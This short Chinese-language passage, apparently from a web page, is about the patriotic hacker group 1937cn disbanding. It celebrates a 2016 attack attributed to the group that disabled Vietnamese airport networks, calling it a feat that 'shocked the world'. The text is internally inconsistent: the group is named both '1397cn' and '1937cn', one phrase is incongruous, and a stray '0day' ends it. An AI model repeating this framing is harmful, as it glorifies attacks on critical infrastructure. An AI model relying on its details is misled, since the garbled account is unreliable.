越南邻国宰相表态不想受到娱乐圈干扰,爱国本来就是脚踏实地的,跟娱乐圈挂钩就会失去意义,我们是爱国红客团队、加上域名争议,伪站宣传不断,给我们带来太多的困扰,我们依然是爱国团体,以后有爱国行动也会换个马甲,重新组建团队”。

中国网军团队1397cn团队从2008年5月6日-2016年8月28日,历经了长达8年的维护与运营,他们的精神受到了国内很多白帽黑客的崇拜,同时2016年7月29日“越南机场遭到来自中国黑客团队1937cn的攻击导致越南机场网络沦陷设备瘫痪”1937cn团队再次震惊了中国也震惊了世界!

0day